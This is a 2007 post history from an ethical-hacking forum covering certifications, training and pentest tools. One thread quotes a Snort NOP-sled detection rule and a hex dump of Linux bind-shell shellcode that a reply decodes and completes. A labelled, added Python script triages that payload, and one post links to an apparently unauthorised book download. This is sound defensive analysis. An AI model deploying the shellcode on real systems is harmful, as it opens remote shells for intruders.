EH-Net
1  Resources / Tutorials / Visit de-ice.net and start cracking the pentest disks on: December 02, 2007, 11:30:34 PM
Hi All,

If you wish to do some simulation based hacking attempts, please visit de-ice.net and download the pentest disks.

Please note that you have to register before downloading anything from this site.

For more info http://de-ice.net/index.php?name=PNphpBB2&file=index&c=10


Happy hacking!!!
2  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Certification advice on: December 01, 2007, 12:13:50 AM
Hi,

I suggest you go for OSCP. There is a wonderful review written by blackazarro.
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,1152.msg3741/#msg3741

Hope this helps.
3  Resources / Tools / Re: Opinions on best Network Vulnerability Scanners on: November 29, 2007, 10:30:23 PM
Hi,

I would like to introduce you to a new startup company in India that does on-demand penetration testing.

Have a look at http://www.ivizindia.com/iviz/

4  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Noob!!! on: November 24, 2007, 11:15:04 PM

I just pulled this out of my IDS logs. The destination IP is my Windows 2003 IIS server.

alert ip $EXTERNAL_NET any -> $HOME_NET $SHELLCODE_PORTS
  (msg:"SHELLCODE x86 NOOP"; content: "|90 90 90 90 90 90
  90 90 90 90 90 90 90 90|"; depth: 128;
  reference:arachnids,181; classtype:shellcode-detect;
  sid:648; rev:5;)

It contained the following payload:

--snip--
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 31 db 31 c9 31 c0 b0 46 cd 80 89 e5 31 d2 b2 66 89 d0
31 c9 89 cb 43 89 5d f8 43 89 5d f4 4b 89 4d fc 8d 4d f4 cd
80 31 c9 89 45 f4 43 66 89 5d ec 66 c7 45 ee 0f 27 89 4d f0
8d 45 ec 89 45 f8 c6 45 fc 10 89 d0 8d 4d f4 cd 80 89 d0 43
43 cd 80 89 d0 43 cd 80 89 c3 31 c9 b2 3f 89 d0 cd 80 89 d0
41 cd 80 eb 18 5e 89 75 08 31 c0 88 46 07 89 45 0c b0 0b 89
f3 8d 4d 08 8d 55 0c cd 80 e8 e3 ff ff ff 2f 62 69 6e 2f 73
--snip--

What does the hex 0x90 represent?

What is the purpose of the 0x90 in the content?

Based on the information available would you classify this alert as an event to log and ignore or something to be concerned about and to dig into further?

dean



The above hex-encoded string is the normal "shellcode" to get a shell. The initial part is filled with "nops" so that even if the EIP lands anywhere nearby, it should reach the shellcode.
The behaviour of this "sc" is to first set a group id "setgid", then to set a session id "setsid". Towards the end it tries to call "execve" to execute /bin/sh.

Anyway, this was the postmortem report of the small snippet you posted. The last hex byte was missing, which should be "68".

This is not good shellcode. It needs some minor tweaking for successful exploitation, and it does not affect a Windows machine [because it is Linux shellcode].

Had some fun in reverse engineering that stuff!!!
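
Added example (not part of the original posts): a Python sketch of how an analyst could triage the alert discussed above by emulating the quoted rule's content and depth check and pulling out basic indicators. The function names and SAMPLE_DUMP are constructed here for illustration; the sample is not the captured payload.

```python
import re

# Pattern and depth taken from the rule quoted in the post (sid:648):
# fourteen 0x90 bytes, searched only within the first 128 payload bytes.
NOP_PATTERN = b"\x90" * 14
DEPTH = 128

def parse_hex_dump(text):
    """Convert a hex dump to bytes, skipping lines that are not pure hex pairs."""
    out = bytearray()
    for line in text.splitlines():
        tokens = line.split()
        if tokens and all(re.fullmatch(r"[0-9a-fA-F]{2}", t) for t in tokens):
            out.extend(int(t, 16) for t in tokens)
    return bytes(out)

def rule_matches(payload):
    """Emulate content + depth: the whole pattern must sit in bytes 0..127."""
    return NOP_PATTERN in payload[:DEPTH]

def longest_nop_run(payload):
    """Length of the longest run of consecutive 0x90 bytes."""
    best = cur = 0
    for b in payload:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best

def triage(payload):
    """Collect the facts an analyst needs to decide whether to dig further."""
    strings = [m.group().decode("ascii")
               for m in re.finditer(rb"[\x20-\x7e]{4,}", payload)]
    return {
        "rule_match": rule_matches(payload),
        "nop_run": longest_nop_run(payload),
        # CD 80 is x86 `int 0x80`, the legacy Linux system-call gate.
        "int80_count": payload.count(b"\xcd\x80"),
        "strings": strings,
    }

# Constructed sample (not the captured payload): 40 NOP bytes, one CD 80
# pair and the ASCII bytes "/bin/s", wrapped in --snip-- markers.
SAMPLE_DUMP = ("--snip--\n" + "\n".join(["90 " * 20] * 2)
               + "\ncd 80 2f 62 69 6e 2f 73\n--snip--")

if __name__ == "__main__":
    print(triage(parse_hex_dump(SAMPLE_DUMP)))
```

A long NOP run alone can also occur in binary file transfers, so the extra indicators (int 0x80 pairs, a /bin/ path fragment) are what separate a likely exploit attempt from noise and show which operating system the payload was written for.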
5  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Noob!!! on: November 21, 2007, 12:46:04 PM

If you are really motivated to be in the security field, then I suggest you read Fyodor's interview published on Slashdot. Refer to the 4th question and his answer to it. If his answer really motivates you to be "THE ONE", then no one can stop you.

http://interviews.slashdot.org/article.pl?sid=03/05/30/1148235&startat=&threshold=4&mode=nocomment&commentsort=3&op=Change

Happy Reading!!!
6  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Pentesting is scary! on: November 21, 2007, 12:14:11 PM
I agree with what dean has posted.

In every job, there is a risk. And success is with the one who is going to take that risk. A penetration test engineer might have the greater risk as he is involved in identifying the weaknesses of his client's network. But I suggest making his role safer by mentioning disclaimers in the final report and scopes. Also, if you are confident in your assessment, then there is no need to worry. Keep on moving with the next assignment and get engaged in self-improvement. This is a profession which requires real professionalism with utmost quality in content and clarity in the data collected.

There is no situation like "Total Security" as every piece of code is vulnerable to bugs. After all, it's a human design and it takes some time to see the vulnerabilities in the wild. With modern sophisticated and complex security products, vulnerabilities and attack vectors would always be at their zenith.

As Bruce Schneier said, "Security is a process, not a product"!!! And humans are the weakest link in security. So wherever there is a human interaction with a security product, there is a possibility for exploitation. This is one thing all penetration engineers should know.

"Total security" means when it's totally cut off from the network :-)
7  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Advice on SCP on: November 21, 2007, 11:32:12 AM
Hi ChrisG,

The second edition of Shellcoder is out. Check out my previous post. It has a link to pdfchm.com where you can download the book.

8  Resources / Tools / Wifiway (Packet injection from ipw3945 is now possible) on: November 20, 2007, 10:30:11 PM
Hi,

I would like to introduce a security suite called "wifiway" for those who are interested in wireless audits and penetration testing. This suite does kernel patching which makes wireless packet injection possible from an Intel wireless card (ipw3945).

For more info http://www.wifiway.org/
You can also see a video hosted on YouTube www.youtube.com/watch?v=voyvusZdcn8

Happy war driving!!!
9  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Advice on SCP on: November 20, 2007, 10:10:37 PM
I have read the first book "Reversing: Secrets of Reverse Engineering". It is a good one. I have to check the second one.

I would also like to add another good book, "The Shellcoder's Handbook" http://www.pdfchm.com/book/the-shellcoders-handbook-discovering-and-exploiting-security-holes-8882/
10  Resources / Career Central / Re: CISSP Boot Camps in India on: November 20, 2007, 08:58:07 PM
A quick Google search gave me these links. Hope it would be useful for you!!!

http://www.google.co.in/search?hl=en&q=CISSP+boot+camps+India&btnG=Google+Search&meta=
11  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Advice on SCP on: November 20, 2007, 08:52:18 PM
Hi,

Thanks for all the wonderful opinions.
The training offered by Infosec is great but it is not an apt solution for me because I am not US based and it requires travelling, which is very expensive :-) for me.

Has anyone heard of online courses offered on advanced penetration testing? I have two such links: CBVA (https://www.iitac.org/content/view/132/110/lang,en/) and CRCEP (https://www.iitac.org/content/view/128/110/lang,en/). These courses come from the creators behind DVL and reverse-engineering.net
I would like to hear opinions regarding these courses and their value!!!


12  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Advice on SCP on: November 20, 2007, 02:21:35 PM
Thanks ChrisG for your valuable advice.

I need to increase my knowledge level and I am looking for the next appropriate certification. I can either go for a vendor-based cert or a vendor-neutral cert. But I am not able to make a final decision on where I should concentrate. I believe certifications won't make you technically competent, but they do give a minimum level in the job market.

I have experience in conducting penetration tests and vulnerability assessments. This also includes web application testing. Now I am interested in a cert that focuses on vulnerability research. Can anyone advise me on how to be on this track?
13  Ethical Hacking Discussions and Related Certifications / General Certification / Re: A+/NETWORK +/SECURITY + on: November 20, 2007, 02:13:20 PM
Hi,

I would like to add the books and tutorials I used for learning Sec+.

1. I used Testout to learn for the Security+ cert. I found it to be really good in improving my knowledge. It also has an interactive lab where you can really understand how security is implemented in different technologies!!! (For more info, go here http://www.testout.com/securityplus/index.htm)

2. I also used the Sybex book to review the contents after learning it from Testout.

3. I also attempted all possible free tests to add to my confidence. Among them, I found techexams to be very useful http://www.techexams.net/co_securityplus.shtml. You can visit this during your last preparation days. A very valuable site.

That's all. The Sec+ exam is easy if you have enough experience in a security field.

All the best!!!
14  Ethical Hacking Discussions and Related Certifications / General Certification / Advice on SCP on: November 20, 2007, 01:57:47 AM
Hi All,

I would like to know more regarding certifications offered by SCP. Is it really good to take a certification offered by SCP? Does it have market value?

Thanks,
© 2013 The Ethical Hacker Network